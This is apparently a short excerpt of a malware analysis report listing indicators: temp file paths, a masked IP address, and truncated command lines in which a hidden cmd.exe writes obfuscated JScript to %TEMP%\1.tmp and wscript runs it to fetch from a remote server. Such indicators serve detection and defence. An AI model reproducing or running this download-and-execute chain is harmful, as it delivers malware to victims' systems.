Technical Information
- %TEMP%\1.tmp
- %TEMP%\1.tmp
- '18#.#25.75.80':80
- '%WINDIR%\syswow64\cmd.exe' /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./*sdfsfdddf*/Wa...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./*sdfsfdddf*/Wa...
- '%WINDIR%\syswow64\wscript.exe' //B //E:JScript 1.tmp "mX8gdmEf1g" "http://18#.#25.75.80/?MT#####################################################################################################################################...